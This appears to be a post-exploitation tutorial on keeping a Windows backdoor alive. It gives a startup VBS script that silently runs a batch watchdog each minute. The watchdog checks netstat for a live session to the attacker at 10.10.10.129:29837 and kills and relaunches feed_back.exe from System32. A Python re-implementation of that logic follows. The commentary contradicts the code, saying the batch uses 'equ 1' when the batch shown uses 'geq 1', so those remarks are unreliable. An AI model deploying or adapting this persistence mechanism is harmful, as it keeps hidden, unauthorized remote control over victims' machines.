First we obtain SYSTEM privileges on the host, over 445 or by some other route, then drop a backdoor named feed_back.exe and a batch file named initiate.bat into C:\Windows\System32, and put initiate.vbs in the startup folder. When the host boots, the VBS script calls initiate.bat at a fixed interval; the batch script checks whether the victim has an established connection back to our attack machine and, based on that, decides whether to (re)launch the backdoor. The file contents are as follows:
initiate.vbs:

' wait five minutes after logon before the first check
wscript.sleep(300000)
set ws=Wscript.CreateObject("wscript.shell")
' run the checker hidden (window style 0) once a minute, forever;
' bWaitOnReturn is omitted, so Run returns at once and a feed_back.exe
' that keeps running inside the batch does not stall this loop
while true
    call ws.Run("C:\WINDOWS\System32\initiate.bat",0)
    wscript.sleep(60000)
wend

initiate.bat:

@echo off
setlocal ENABLEDELAYEDEXPANSION

rem keep only the netstat lines that mention the attack machine (10.10.10.129:29837)
netstat -ano | findstr "10.10.10.129:29837" > %temp%\temp.txt
rem %%k is the number of those lines in ESTABLISHED state
for /F %%k in ('type %temp%\temp.txt ^| find /i "ESTABLISHED" /c') do (
    rem at least one established session means the backdoor is alive; "equ 1" would
    rem wrongly kill it whenever two sessions are open at the same time
    if %%k geq 1 (
        echo succeed
    ) else (
        rem connection has not been established: no matter what, kill feed_back.exe first
        rem get pid of feed_back.exe (second CSV column of the tasklist output)
        for /f "delims=, tokens=2" %%a in ('tasklist /FI "IMAGENAME eq feed_back.exe" /fo csv /nh') do (
            set str=%%~a
            rem if a pid was found, kill that process
            if defined str (
                taskkill /F /PID !str!
            )
        )
        rem execute the feedback program again
        C:\WINDOWS\System32\feed_back.exe
    )
)

The interval can be controlled by changing the values passed to sleep in initiate.vbs (the first call is the delay before the first check after boot, the second is the polling period).
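The decision logic of initiate.bat, re-implemented below in Python over constructed sample output so it can be checked offline. This is an added example, not code from the original post: the netstat and tasklist text is made up (only the address 10.10.10.129:29837 comes from the batch file), and the function names are my own. It differs from the batch in two deliberate ways that a practitioner would want: it matches the Foreign Address column rather than substring-matching the whole line (so a listening socket or a local port that happens to contain the same digits is not counted), and it treats "at least one ESTABLISHED session" as connected, which is what the batch's `if %%k equ 1` gets wrong when two sessions are open at once. The sample netstat deliberately contains two ESTABLISHED sessions to show that case.

```python
import csv
from typing import List, Tuple

# Constructed sample of `netstat -ano` output (not captured from any real host).
# Two ESTABLISHED sessions to the C2 plus a TIME_WAIT one that must not count.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    10.10.10.130:49712     10.10.10.129:29837     ESTABLISHED     4120
  TCP    10.10.10.130:49713     10.10.10.129:29837     ESTABLISHED     4120
  TCP    10.10.10.130:49720     10.10.10.129:29837     TIME_WAIT       0
  UDP    0.0.0.0:5353           *:*                                    1404
"""

# Constructed samples of `tasklist /FI "IMAGENAME eq feed_back.exe" /fo csv /nh`:
# one with the backdoor running, one with the INFO line tasklist prints when nothing matches.
SAMPLE_TASKLIST = '"feed_back.exe","4120","Console","1","5,316 K"\r\n'
SAMPLE_TASKLIST_EMPTY = "INFO: No tasks are running which match the specified criteria.\r\n"

C2 = "10.10.10.129:29837"  # attack machine address, taken from initiate.bat


def established_to(netstat_output: str, c2: str) -> List[int]:
    """PIDs of TCP sessions whose Foreign Address is c2 and whose state is ESTABLISHED.

    netstat -ano prints TCP rows as exactly five whitespace-separated columns;
    anything else (headers, UDP rows, blank lines) is skipped.
    """
    pids = []
    for line in netstat_output.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[0] != "TCP":
            continue
        _proto, _local, foreign, state, pid = parts
        if foreign == c2 and state == "ESTABLISHED":
            pids.append(int(pid))
    return pids


def backdoor_pids(tasklist_csv: str) -> List[int]:
    """PIDs from `tasklist /fo csv /nh` output; the quoted "5,316 K" column is why
    a real CSV parser is used instead of the batch file's delims=, split."""
    pids = []
    for row in csv.reader(tasklist_csv.splitlines()):
        # The "INFO: No tasks ..." line has a single column and no numeric PID.
        if len(row) >= 2 and row[1].isdigit():
            pids.append(int(row[1]))
    return pids


def should_restart(netstat_output: str, tasklist_csv: str, c2: str) -> Tuple[bool, List[int]]:
    """Reproduce the watchdog's decision.

    Returns (restart, pids_to_kill): if any ESTABLISHED session to c2 exists,
    leave the backdoor alone; otherwise kill every running feed_back.exe and relaunch.
    """
    if established_to(netstat_output, c2):
        return False, []
    return True, backdoor_pids(tasklist_csv)


if __name__ == "__main__":
    print("connected:", should_restart(SAMPLE_NETSTAT, SAMPLE_TASKLIST, C2))
    print("disconnected:", should_restart("", SAMPLE_TASKLIST, C2))
```

With the sample above, `should_restart` returns `(False, [])` while the two sessions are established and `(True, [4120])` once the netstat output no longer shows them; the original batch with `equ 1` would have returned the restart decision in the first case too.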
